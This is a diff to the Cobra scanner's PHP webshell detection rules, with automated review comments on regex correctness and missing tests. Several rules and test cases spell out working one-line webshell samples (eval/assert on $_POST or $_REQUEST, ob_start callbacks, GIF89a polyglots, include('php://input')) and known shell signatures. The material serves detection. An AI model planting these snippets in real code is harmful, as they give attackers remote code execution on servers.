@@ -2,9 +2,7 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="webshell14"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - \$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\s*['\"]|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)\s*\()[\s\S]{0,200}\s*\$\1\s*\(+[^\)]*(\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25}) - ]]></match> + <match mode="regex-only-match"><![CDATA[\$\s*(\w+)\s*=\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\s*['\"]|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)\s*\()[\s\S]{0,200}\s*\$\1\s*\(+[^\)]*(\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})]]></match> <level value="7"/> <test> <case assert="true"><![CDATA[]]></case> diff --git a/rules/CVI-360015.xml b/rules/CVI-360015.xml index 44633e23..df9048ae 100644 --- a/rules/CVI-360015.xml +++ b/rules/CVI-360015.xml @@ -2,9 +2,7 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="webshell15"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - sqlite_create_function\s*\([\s\S]{0,200}(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)|(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)[\s\S]{0,200}sqlite_create_function\s*\( - ]]></match> + <match mode="regex-only-match"><![CDATA[sqlite_create_function\s*\([\s\S]{0,200}(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)|(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)[\s\S]{0,200}sqlite_create_function\s*\(]]></match> <level value="7"/> <test> <case assert="true"><![CDATA[]]></case> diff --git a/rules/CVI-360016.xml b/rules/CVI-360016.xml index c6908308..0daa4f57 100644 --- a/rules/CVI-360016.xml +++ b/rules/CVI-360016.xml 
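Review bot: The CVI-360014 hunk rewrites the `<match>` but leaves `<case assert="true"><![CDATA[]]></case>` — an empty sample asserted to match, which either fails or passes vacuously depending on the harness and documents nothing about what the rule targets. A one-line case the pattern does match is `<case assert="true"><![CDATA[$f = "assert"; $f($_POST['x']);]]></case>` (quoted callable bound to `$f`, then `$f(` with a superglobal argument). Dropping the `$_GET`-assignment alternative from the right-hand side looks deliberate given the new CVI-360034 cases, but a comment in `<solution>` saying that variant is covered there would save the next reader the cross-check.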
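Review bot: CVI-360015 has the same empty `<case assert="true"><![CDATA[]]></case>` after its `<match>` was collapsed onto one line, so nothing verifies the rule. `<case assert="true"><![CDATA[sqlite_create_function($db, 'e', 'system', 1);]]></case>` is matched by the first alternative (`sqlite_create_function\s*\(` followed within 200 characters by `system`) and would serve as the regression check.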
@@ -2,12 +2,11 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="webshell16"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - \b(filter_var|filter_var_array)\b\s*\(.*FILTER_CALLBACK[^;]*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)) - ]]></match> + <match mode="regex-only-match"><![CDATA[\b(filter_var|filter_var_array)\b\s*\(.*FILTER_CALLBACK[^;]*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec))]]></match> <level value="7"/> <test> - <case assert="true"><![CDATA[]]></case> + <case assert="true"><![CDATA[filter_var($_REQUEST['pass'], FILTER_CALLBACK, array('options' => 'assert'));]]></case> + <case assert="true"><![CDATA[filter_var_array(array('test' => $_REQUEST['pass']), array('test' => array('filter' => FILTER_CALLBACK, 'options' => 'assert')));]]></case> </test> <solution> ## 安全风险 diff --git a/rules/CVI-360017.xml b/rules/CVI-360017.xml index 4b6e320d..72325724 100644 --- a/rules/CVI-360017.xml +++ b/rules/CVI-360017.xml 
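Review bot: The `.*` between `\(` and `FILTER_CALLBACK` in the CVI-360016 pattern is line-bound, so a call split across lines (`filter_var(\n$_REQUEST['pass'],\nFILTER_CALLBACK, …)`) evades the rule unless the engine applies a DOTALL flag, which I cannot tell from here. The sibling rules in this patch use `[\s\S]{0,200}` for the same purpose; `\(\s*[\s\S]{0,200}?FILTER_CALLBACK` would keep the two new cases matching and close the multi-line gap.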
@@ -2,12 +2,13 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="webshell17"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - \$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\s*['\"]|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)\s*\()[\s\S]{0,200}\b(filter_var|filter_var_array)\b\s*\(.*FILTER_CALLBACK[^;]*\$\1 - ]]></match> + <match mode="regex-only-match"><![CDATA[\$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|.*['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\s*['\"]|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)\s*\()[\s\S]{0,200}\b(filter_var|filter_var_array)\s*\(.*FILTER_CALLBACK[^;]*\$\1]]></match> <level value="7"/> <test> - <case assert="true"><![CDATA[]]></case> + <case assert="true"><![CDATA[ + $op=array('options' => 'assert'); + filter_var($_REQUEST['pass'], FILTER_CALLBACK, $op); + ]]></case> </test> <solution> ## 安全风险 diff --git a/rules/CVI-360018.xml b/rules/CVI-360018.xml index d4cd189f..ae017365 100644 --- a/rules/CVI-360018.xml +++ b/rules/CVI-360018.xml 
@@ -2,12 +2,10 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="webshell18"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - \b(mb_ereg_replace|mb_eregi_replace)\b\s*\((.*,){3}\s*(['\"][^,\"'\)]*e[^,\"'\)]*['\"]|.*(\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25}).*|chr\s*\(\s*101|chr\s*\(\s*0x65|chr\s*\(\s*0145)\s*\) - ]]></match> + <match mode="regex-only-match"><![CDATA[\s*(mb_ereg_replace|mb_eregi_replace)\s*\((.*,){3}\s*(['\"][^,\"'\)]*e[^,\"'\)]*['\"]|.*(\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25}).*|chr\s*\(\s*101|chr\s*\(\s*0x65|chr\s*\(\s*0145)\s*\)]]></match> <level value="7"/> <test> - <case assert="true"><![CDATA[]]></case> + <case assert="true"><![CDATA[mb_ereg_replace('.*', $_REQUEST['op'], '', 'e');]]></case> </test> <solution> ## 安全风险 diff --git a/rules/CVI-360019.xml b/rules/CVI-360019.xml index e89fb879..6d8df0af 100644 --- a/rules/CVI-360019.xml +++ b/rules/CVI-360019.xml @@ -2,12 +2,13 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="webshell19"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - \$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{3,25})|['\"][^;]*e|[^;]*chr[\s\(]*(101|0x65|0145))[\s\S]{0,200}\b(mb_ereg_replace|mb_eregi_replace)\b\s*\((.*,){3}\s*\$\1 - ]]></match> + <match mode="regex-only-match"><![CDATA[\$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{3,25})|['\"][^;]*e|[^;]*chr[\s\(]*(101|0x65|0145))[\s\S]{0,200}\b(mb_ereg_replace|mb_eregi_replace)\s*\((.*,){3}\s*\$\1]]></match> <level value="7"/> <test> - <case assert="true"><![CDATA[]]></case> + <case assert="true"><![CDATA[ + $e = "\ise"; + $data = mb_ereg_replace("/[^A-Za-z0-9\.\-]/","",$data,$e); + ]]></case> </test> <solution> ## 安全风险 diff --git a/rules/CVI-360022.xml b/rules/CVI-360022.xml index cba0ee2d..7e110ed8 100644 --- a/rules/CVI-360022.xml +++ b/rules/CVI-360022.xml 
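Review bot: Replacing `\b(mb_ereg_replace|mb_eregi_replace)\b` with `\s*(mb_ereg_replace|mb_eregi_replace)` in CVI-360018 loses the word boundary, so any identifier merely ending in the function name (`my_mb_ereg_replace(`) now fires, and the leading `\s*` is a no-op for an unanchored search. Keep the original `\b` prefix: `\b(mb_ereg_replace|mb_eregi_replace)\s*\(`. The new `'e'`-mode test case is matched as far as I can trace it.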
@@ -2,12 +2,13 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="webshell22"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - \b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|include)(\b\s)*\(\s*(file_get_contents\s*\(\s*)?['\"]php://input - ]]></match> + <match mode="regex-only-match"><![CDATA[\b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|include)(\b\s)*\(\s*(file_get_contents\s*\(\s*)?['\"]php://input]]></match> <level value="7"/> <test> - <case assert="true"><![CDATA[]]></case> + <case assert="true"><![CDATA[ + ini_set('allow_url_include, 1'); + include('php://input'); + ]]></case> </test> <solution> ## 安全风险 diff --git a/rules/CVI-360023.xml b/rules/CVI-360023.xml index 4ae30c28..ee83be9c 100644 --- a/rules/CVI-360023.xml +++ b/rules/CVI-360023.xml @@ -2,13 +2,8 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="webshell23"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - ^(\xff\xd8|\x89\x50|GIF89a|GIF87a|BM|\x00\x00\x01\x00\x01)[\s\S]*<\?\s*php - ]]></match> + <match mode="regex-only-match"><![CDATA[^(\xff\xd8|\x89\x50|GIF89a|GIF87a|BM|\x00\x00\x01\x00\x01)[\s\S]*<\?\s*php]]></match> <level value="7"/> - <test> - <case assert="true"><![CDATA[]]></case> - </test> <solution> ## 安全风险 代码中存在webshell diff --git a/rules/CVI-360024.xml b/rules/CVI-360024.xml index bc678fdc..14a7e530 100644 --- a/rules/CVI-360024.xml +++ b/rules/CVI-360024.xml @@ -2,9 +2,7 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="webshell24"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - \$(\w)=\$[a-zA-Z]\('',\$\w\);\$\1\(\); - ]]></match> + <match mode="regex-only-match"><![CDATA[\$(\w)=\$[a-zA-Z]\('',\$\w\);\$\1\(\);]]></match> <level value="7"/> <test> <case assert="true"><![CDATA[]]></case> diff --git a/rules/CVI-360025.xml b/rules/CVI-360025.xml index 57d67a92..a88c4111 100644 --- a/rules/CVI-360025.xml 
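Review bot: The CVI-360022 pattern still requires a literal `(` after the function name, so the paren-less forms `include 'php://input';` / `require "php://input";` (include is a language construct, not a function) are missed, and `require`, `require_once`, `include_once` are not in the list at all. `\b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|include|include_once|require|require_once)\b[\s\(]*(file_get_contents\s*\(\s*)?['\"]php://input` covers both and keeps the new case matching. The sample's `ini_set('allow_url_include, 1')` has the quote in the wrong place — it should read `ini_set('allow_url_include', 1)` so the example is the real precondition for this technique.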
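Review bot: CVI-360023 deletes its `<test>` block instead of filling it, so the image-polyglot rule now has no regression check at all. `<case assert="true"><![CDATA[GIF89a<?php eval($_POST[1]);?>]]></case>` is a one-line sample the pattern matches. Note also that the `\xff\xd8` / `\x89\x50` alternatives only hit if the scanner feeds the pattern raw bytes or Latin-1-decoded text — with UTF-8 decoding a JPEG/PNG header is mangled before matching — and `^` only anchors to the file start if the engine runs the pattern on the whole file rather than per line; neither is visible from this hunk, so a comment in `<solution>` stating the assumption would help.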
+++ b/rules/CVI-360025.xml @@ -2,9 +2,7 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="webshell25"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - \$(\w+)\s*=\s*str_replace\s*\([\s\S]*\$(\w+)\s*=\s*\$(\w+)(([\s\S]{0,255})|(\s*\(\'\',\s*(\$(\w+)\s*\(\s*)+))\$\1\s*\([\s\S]{0,100};?\s*\$\2\(?\s*\) - ]]></match> + <match mode="regex-only-match"><![CDATA[\$(\w+)\s*=\s*str_replace\s*\([\s\S]*\$(\w+)\s*=\s*\$(\w+)(([\s\S]{0,255})|(\s*\(\'\',\s*(\$(\w+)\s*\(\s*)+))\$\1\s*\([\s\S]{0,100};?\s*\$\2\(?\s*\)]]></match> <level value="7"/> <test> <case assert="true"><![CDATA[]]></case> diff --git a/rules/CVI-360026.xml b/rules/CVI-360026.xml index e1abf535..e8d8ef15 100644 --- a/rules/CVI-360026.xml +++ b/rules/CVI-360026.xml @@ -2,12 +2,27 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="webshell26"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - ob_start\s*\(+\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec).{0,20}|['\"]\s*\w+[\s\S]{1,50}phpinfo\s*\(\s*\)) - ]]></match> + <match mode="regex-only-match"><![CDATA[ob_start\s*\(+\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec).{0,20}|['\"]\s*\w+[\s\S]{1,50}phpinfo\s*\(\s*\))]]></match> <level value="7"/> <test> - <case assert="true"><![CDATA[]]></case> + <case assert="true"><![CDATA[ + $cb= 'system'; + ob_start($cb); + echo $_GET[c]; + ob_end_flush(); + ]]></case> + <case assert="true"><![CDATA[ + $evalstr=""; + ob_start(function ($c,$d){global $evalstr;$evalstr=$c;}); + echo $_REQUEST['pass']; + ob_end_flush(); + assert($evalstr); + ]]></case> + <case assert="true"><![CDATA[ + ob_start(function ($c,$d){register_shutdown_function('assert',$c);}); + echo $_REQUEST['pass']; + ob_end_flush(); + ]]></case> </test> <solution> ## 安全风险 diff --git a/rules/CVI-360027.xml b/rules/CVI-360027.xml index df73e949..61dd65ef 100644 --- a/rules/CVI-360027.xml 
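Review bot: None of the three new `assert="true"` cases in CVI-360026 appears to be matched by the (unchanged) pattern: both alternatives after `ob_start\s*\(+\s*` begin with `['\"]`, i.e. a quoted callback, while the samples pass `$cb` and `function (…)` closures, so the cases should fail if the harness runs them. Either change the samples to the quoted form the rule targets (`ob_start('system'); echo $_GET[c];`) or extend the pattern with the variable/closure forms tied to the `echo $_REQUEST[…]`/`assert` that follows, e.g. `|\$\w+\s*\)[\s\S]{0,100}echo\s*\$_(GET|POST|REQUEST|COOKIE)|function\s*\([^)]*\)\s*\{[^}]{0,100}(assert|register_shutdown_function)`. Flagging every `ob_start($var)` on its own would be noisy in ordinary PHP code, so the tied form is the safer extension.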
+++ b/rules/CVI-360027.xml @@ -2,9 +2,7 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="webshell27"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - \b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\b\s*\(((\$_SERVER|\$_ENV|getenv|\$GLOBALS)\s*[\[\(]\s*['\"]+(REQUEST_URI|QUERY_STRING|HTTP_[\w_]+|REMOTE_[\w_])['\"\s]+\s*[\]\)]|php://input|exif_read_data\s*\() - ]]></match> + <match mode="regex-only-match"><![CDATA[\b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\b\s*\(((\$_SERVER|\$_ENV|getenv|\$GLOBALS)\s*[\[\(]\s*['\"]+(REQUEST_URI|QUERY_STRING|HTTP_[\w_]+|REMOTE_[\w_])['\"\s]+\s*[\]\)]|php://input|exif_read_data\s*\()]]></match> <level value="7"/> <test> <case assert="true"><![CDATA[]]></case> diff --git a/rules/CVI-360028.xml b/rules/CVI-360028.xml index 76131cdf..ee59faee 100644 --- a/rules/CVI-360028.xml +++ b/rules/CVI-360028.xml @@ -2,12 +2,10 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="webshell28"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - eval\(\"\?>\"\.|gzinflate\(base64_decode\(|eval\(base64_decode\(|cat\s*/etc/passwd|Safe_Mode\s*Bypass - ]]></match> + <match mode="regex-only-match"><![CDATA[eval\(\"\?>\"\.|gzinflate\(base64_decode\(|eval\(base64_decode\(|cat\s*/etc/passwd|Safe_Mode\s*Bypass]]></match> <level value="7"/> <test> - <case assert="true"><![CDATA[]]></case> + <case assert="true"><![CDATA[eval(base64_decode(ZXZhbChiYXNlNjRfZGVjb2RlKFpYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtFeDVPRGhRTTBKdlkwRndiR1J0Um5OTFExSm1WVVU1VkZaR2RHdGlNamw1V0ZOclMweDVPQzVqYUhJb05EY3BMbEJuS1NrNykpOw));]]></case> </test> <solution> ## 安全风险 diff --git a/rules/CVI-360029.xml b/rules/CVI-360029.xml index f6f8467e..265c9dbc 100644 --- a/rules/CVI-360029.xml +++ b/rules/CVI-360029.xml 
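Review bot: The CVI-360028 alternatives `eval\(base64_decode\(` and `gzinflate\(base64_decode\(` are literal, so a single space (`eval (base64_decode(`, `eval( base64_decode(`) or a line break defeats them; `eval\s*\(\s*base64_decode\s*\(` and `gzinflate\s*\(\s*base64_decode\s*\(` keep the new case matching and remove that trivial bypass. The sample also passes the base64 blob unquoted (`base64_decode(ZXZh…)`), which is not how it appears in real shells — quoting it (`base64_decode('ZXZh…')`) still matches and makes the case a faithful example.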
@@ -2,12 +2,8 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="webshell29"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - \$_\[\$_|\${\"_P\"\.|a(.)s\1s\1e\1r\1t|'e'\.'v'\.'a'\.'l|687474703a2f2f626c616b696e2e64756170702e636f6d2f7631|python_eval\(\"import os\\nos.system\(|\$bind_pl\s*=\s*\"IyEvdXNyL2Jpbi9lbnYgcGV|phpsocks5_encrypt\s*\(|eNrs/Vmv41iWJgq+ZwH1H7wdAWRksypJihRF3kQ0mvMsihTnuoUA53meeVG/valj5mbuHpF9b6P7se - ]]></match> + <match mode="regex-only-match"><![CDATA[\$_\[\$_|\${\"_P\"\.|a(.)s\1s\1e\1r\1t|'e'\.'v'\.'a'\.'l|687474703a2f2f626c616b696e2e64756170702e636f6d2f7631|python_eval\(\"import os\\nos.system\(|\$bind_pl\s*=\s*\"IyEvdXNyL2Jpbi9lbnYgcGV|phpsocks5_encrypt\s*\(|eNrs/Vmv41iWJgq+ZwH1H7wdAWRksypJihRF3kQ0mvMsihTnuoUA53meeVG/valj5mbuHpF9b6P7se]]></match> <level value="7"/> - <test> - </test> <solution> ## 安全风险 代码中存在webshell diff --git a/rules/CVI-360030.xml b/rules/CVI-360030.xml index 3d44e938..2ac9f909 100644 --- a/rules/CVI-360030.xml +++ b/rules/CVI-360030.xml @@ -2,12 +2,8 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="webshell30"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - preg_replace\s*\(\s*['\"][^;]*e[^;]*['\"],([^;]{0,30}\\x|[^;\)]{200,300})|\$back_connect=\"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU2|define\('gzip',function_exists\(\"ob_gzhandler\"\)|chr\(112\)\.chr\(97\)\.chr\(115\)\.chr\(115\)|687474703a2f2f377368656c - ]]></match> + <match mode="regex-only-match"><![CDATA[preg_replace\s*\(\s*['\"][^;]*e[^;]*['\"],([^;]{0,30}\x|[^;\)]{200,300})|\$back_connect=\"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU2|define\('gzip',function_exists\(\"ob_gzhandler\"\)|chr\(112\)\.chr\(97\)\.chr\(115\)\.chr\(115\)|687474703a2f2f377368656c]]></match> <level value="7"/> - <test> - </test> <solution> ## 安全风险 代码中存在webshell diff --git a/rules/CVI-360031.xml b/rules/CVI-360031.xml index 87d64654..2b43470f 100644 --- a/rules/CVI-360031.xml +++ b/rules/CVI-360031.xml 
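Review bot: The `[^;]{0,30}\\x` → `[^;]{0,30}\x` edit in the CVI-360030 `preg_replace` alternative has the same problem as CVI-360010 in this patch: `\\x` matched the literal `\x` of a hex-escaped payload in PHP source, whereas a bare `\x` is an incomplete hex escape that Python's `re` rejects at compile time and PCRE reads as a NUL byte. Restore `([^;]{0,30}\\x|[^;\)]{200,300})`. The rule's `<test>` block was also removed rather than populated, so nothing would have caught the broken pattern.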
@@ -2,12 +2,8 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="webshell31"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - ini_get\s*\(\s*\"disable_functions\"\s*\)|\d\s*=>\s*array\s*\(\s*['\"]\s*pipe\s*['\"]|gzuncompress\(base64_decode\(|crypt\(\$_SERVER\['HTTP_H0ST'\],\d+\)==|if\(file_exists\(\$settings\['STOPFILE'\]\)\) - ]]></match> + <match mode="regex-only-match"><![CDATA[ini_get\s*\(\s*\"disable_functions\"\s*\)|\d\s*=>\s*array\s*\(\s*['\"]\s*pipe\s*['\"]|gzuncompress\(base64_decode\(|crypt\(\$_SERVER\['HTTP_H0ST'\],\d+\)==|if\(file_exists\(\$settings\['STOPFILE'\]\)\)]]></match> <level value="7"/> - <test> - </test> <solution> ## 安全风险 代码中存在webshell diff --git a/rules/CVI-360032.xml b/rules/CVI-360032.xml index db6f822e..5a32e9df 100644 --- a/rules/CVI-360032.xml +++ b/rules/CVI-360032.xml @@ -1,13 +1,9 @@ <?xml version="1.0" encoding="UTF-8"?> <cobra document="https://github.com/wufeifei/cobra"> - <name value="webshell32"/> + <name value="webshell"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - \$nofuncs='no\s*exec\s*functions|udf\.dll|\$b374k|POWER-BY\s*WWW.XXDDOS.COM|<title>Safes\s*Mode\s*Shell|Siyanur\.PHP\s*|c999shexit\(\)|\$c99sh_|c99_sess_put\(|Coded\s*by\s*cyb3r|cyb3r_getupdate\(|coded\s*by\s*tjomi4|john\.barker446@gmail\.com|eval\(\"\\\$x=gzin\"|eval\(\"\?>\"\.gzinflate\(base64_decode\(|eval\(gzinflate\(base64_decode\(|eval\(gzuncompress\(base64_decode\(|eval\(gzinflate\(str_rot13\(base64_decode\(|function_exists\(\"zigetwar_buff_prepare\"\)|dQ99shell|r57shell|c99shell|lama's'hell\s*v|Carbylamine\s*PHP\s*Encoder|Safe\s*Mode\s*Shell|\$dI3h=\${'_REQUEST'};|new\s*COM\(\"IIS://localhost/w3svc\"\)|n57http-based\[\s*-\]terminal|Dosya\s*Olu|errorlog\(\"BACKEND:\s*startReDuh,|form\s*name=sh311Form|PHPJackal
|Reddragonfly's\s*WebShell|\(\"system\"==\$seletefunc\)\?system\(\$shellcmd\)|eNrsvGmT40iSKPZ5xmz|CrystalShell\s*v\.|Special\s*99\s*Shell|Simple\s*PHP\s*Mysql\s*client|'_de'\.'code'|phpsocks5_encrypt\(|define\('PHPSHELL_VERSION',|ZXZhbCgkX1BPU1RbMV0p|\$__H_H\(\$__C_C" - ]]>
+ Safes\s*Mode\s*Shell|Siyanur\.PHP\s*|c999shexit\(\)|\$c99sh_|c99_sess_put\(|Coded\s*by\s*cyb3r|cyb3r_getupdate\(|coded\s*by\s*tjomi4|john\.barker446@gmail\.com|eval\(\"\\\$x=gzin\"|eval\(\"\?>\"\.gzinflate\(base64_decode\(|eval\(gzinflate\(base64_decode\(|eval\(gzuncompress\(base64_decode\(|eval\(gzinflate\(str_rot13\(base64_decode\(|function_exists\(\"zigetwar_buff_prepare\"\)|dQ99shell|r57shell|c99shell|lama's'hell\s*v|Carbylamine\s*PHP\s*Encoder|Safe\s*Mode\s*Shell|\$dI3h=\${'_REQUEST'};|new\s*COM\(\"IIS://localhost/w3svc\"\)|n57http-based\[\s*-\]terminal|Dosya\s*Olu|errorlog\(\"BACKEND:\s*startReDuh,|form\s*name=sh311Form|PHPJackal
|Reddragonfly's\s*WebShell|\(\"system\"==\$seletefunc\)\?system\(\$shellcmd\)|eNrsvGmT40iSKPZ5xmz|CrystalShell\s*v\.|Special\s*99\s*Shell|Simple\s*PHP\s*Mysql\s*client|'_de'\.'code'|phpsocks5_encrypt\(|define\('PHPSHELL_VERSION',|ZXZhbCgkX1BPU1RbMV0p|\$__H_H\(\$__C_C"]]>
- - ## 安全风险 代码中存在webshell diff --git a/rules/CVI-360033.xml b/rules/CVI-360033.xml index 5b136bd9..9f77cf83 100644 --- a/rules/CVI-360033.xml +++ b/rules/CVI-360033.xml @@ -1,13 +1,9 @@ - + - |define\('envlpass',|KingDefacer_getupdate\(|relative2absolute\(|Host:\s*old.zone-h.org|
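Review bot: Renaming CVI-360032 from `webshell32` to plain `webshell` makes its label indistinguishable from the rest of the webshellNN family, which matters if `name` is what findings are reported under (it presumably is); CVI-360007 in this same patch got a descriptive name, so something like `<name value="已知webshell字符串特征"/>` would follow that convention. Also, in this view the new pattern line begins at `Safes\s*Mode\s*Shell|…` while the removed one began with `\$nofuncs='no\s*exec\s*functions|udf\.dll|\$b374k|…|<title>Safes…` — most likely the `<title>` and everything before it were eaten by rendering, but it is worth confirming that those leading alternatives survived the collapse onto one line.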

PHPKonsole

|\$_SESSION\['hassubdirs'\]\[\$treeroot\]|strtolower\(\$cmd\)\s*==\s*\"canirun\"|\$shell\s*=\s*'uname\s*-a;\s*w;\s*id;|Avrasya\s*Veri\s*ve\s*NetWork|

Linux Shells

|\$MyShellVersion\s*=\s*\"MyShell|PHP\s*Shell\s*[^\n\r]*|\$OOO000000=urldecode|1MSSYowqjzlVVAwAoHHFXzQ5Lc|'xiaoqiwangluo'|EqQC1FhyXxpEi7l2g\+yNjW62S|\$_uU\(83\)\.\$_uU\(84\)|7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8|\s*ARS\s*Terminator\s*Shell|base64_decode\(\"R0lGODdhEgASAKEAAO7u7gAAAJmZmQAAACwAAA|\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00|'W3D\s*Shell|\$back_connect=\"IyEvdXNyL2Jpbi9wZXJsD - ]]></match> + <match mode="regex-only-match"><![CDATA[PD9waHANCiRzX3ZlciA9ICIxLjAiOw0KJHNfdGl0bGUgPSAiWG5vbnltb3V4IFNoZWxsIC|GFnyF4lgiGXW2N7BNyL5EEyQA42LdZtao2S9f|IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7|setcookie\(\"N3tsh_surl\"\);|function\s*Tihuan_Auto|\$_COOKIE\['b374k'\]|function_exists\(\"k1r4_sess_put\"\)|http://www.7jyewu.cn/|scookie\('phpspypass|PHVayv.php\?duzkaydet=|phpRemoteView</a>|define\('envlpass',|KingDefacer_getupdate\(|relative2absolute\(|Host:\s*old.zone-h.org|<h3>PHPKonsole</h3>|\$_SESSION\['hassubdirs'\]\[\$treeroot\]|strtolower\(\$cmd\)\s*==\s*\"canirun\"|\$shell\s*=\s*'uname\s*-a;\s*w;\s*id;|Avrasya\s*Veri\s*ve\s*NetWork|<h1>Linux Shells</h1>|\$MyShellVersion\s*=\s*\"MyShell|<a\s*href=\"http://ihacklog.com/\"|setcookie\(\s*\"mysql_web_admin_username\"\s*\)|<title>PHP\s*Shell\s*[^\n\r]*|\$OOO000000=urldecode|1MSSYowqjzlVVAwAoHHFXzQ5Lc|'xiaoqiwangluo'|EqQC1FhyXxpEi7l2g\+yNjW62S|\$_uU\(83\)\.\$_uU\(84\)|7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8|\s*ARS\s*Terminator\s*Shell|base64_decode\(\"R0lGODdhEgASAKEAAO7u7gAAAJmZmQAAACwAAA|\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00|'W3D\s*Shell|\$back_connect=\"IyEvdXNyL2Jpbi9wZXJsD]]></match> <level value="7"/> - <test> - </test> <solution> ## 安全风险 代码中存在webshell diff --git a/rules/CVI-360034.xml b/rules/CVI-360034.xml index 76ee617f..ef937b79 100644 --- a/rules/CVI-360034.xml +++ b/rules/CVI-360034.xml 
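Review bot: CVI-360033 drops its `<test>` block rather than filling it, leaving a ~40-alternative signature list with no regression check; `<case assert="true"><![CDATA[$back_connect="IyEvdXNyL2Jpbi9wZXJsD";]]></case>` is matched by the `\$back_connect=\"IyEvdXNyL2Jpbi9wZXJsD` alternative and would do. A few entries are plain identifiers rather than shell-specific markers — `relative2absolute\(` and `setcookie\(\s*\"mysql_web_admin_username\"\s*\)` could plausibly occur in a legitimate file-manager or admin tool — so they may be worth a lower `<level>` or an extra distinguishing token; I cannot judge their false-positive rate from here.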
